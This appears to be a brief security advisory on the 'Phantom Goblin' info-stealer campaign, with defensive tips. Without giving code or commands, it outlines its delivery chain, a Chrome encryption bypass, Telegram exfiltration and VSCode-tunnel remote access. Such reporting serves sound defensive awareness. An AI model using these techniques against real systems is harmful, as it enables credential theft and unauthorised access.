A complex malware campaign dubbed "Phantom Goblin" has been discovered, which employs social engineering techniques to install information-stealing malware. The malware is distributed by RAR attachments in spam messages, which includes a poisoned shortcut file posing as a PDF.
When executed, the LNK file launches a PowerShell operation to download further payloads from a GitHub repository, ensuring persistence by generating a registry entry that starts at system boot. These payloads, such as "updater.exe," "vscode.exe," and "browser.exe," spoof legitimate apps, which complicates detection.
The malware primarily targets web browsers and development tools to steal sensitive data. It harvests cookies, login passwords, and browsing history by forcing browsers such as Chrome, Brave, and Edge to shut down. The "updater.exe" payload allows remote debugging to bypass Chrome's App Bound Encryption (ABE) and achieve covert data exfiltration.
The stolen information is subsequently transferred to a Telegram channel via the Telegram Bot API. This approach allows cybercriminals to access data in real time without suspicion.
Phantom Goblin also uses Visual Studio Code (VSCode) tunnels for remote unauthorised access. The "vscode.exe" payload downloads a legitimate version of VSCode, unpacks it, and creates a tunnel to maintain persistent control over compromised PCs. These connection credentials are passed to a Telegram bot, which allows remote access without triggering traditional security notifications.
Prevention tips
Several best practices are recommended by experts to safeguard systems against Phantom Goblin and similar threats:
Email Filtering: Use advanced filtering techniques to block suspicious attachments, especially those in RAR, ZIP, or LNK format. Before opening any attachments, be sure they have been scanned with the latest antivirus software.
Disabling VSCode tunnels: Enforce access controls and authentication measures to prevent unauthorised users from using Visual Studio Code tunnels. Limiting the ability to use VSCode on sensitive systems can help prevent remote access.
PowerShell Restrictions: Disable or limit the use of PowerShell and script execution on computers unless absolutely necessary. Monitoring for suspicious PowerShell activity, such as script execution from external sources, can assist detect and prevent malicious operations.
Browser Security: Use strong browser security mechanisms to prevent unauthorised debugging and limit access to sensitive data stored within browsers. Enforcing multi-factor authentication (MFA) and session timeouts can assist to secure browser-based credentials.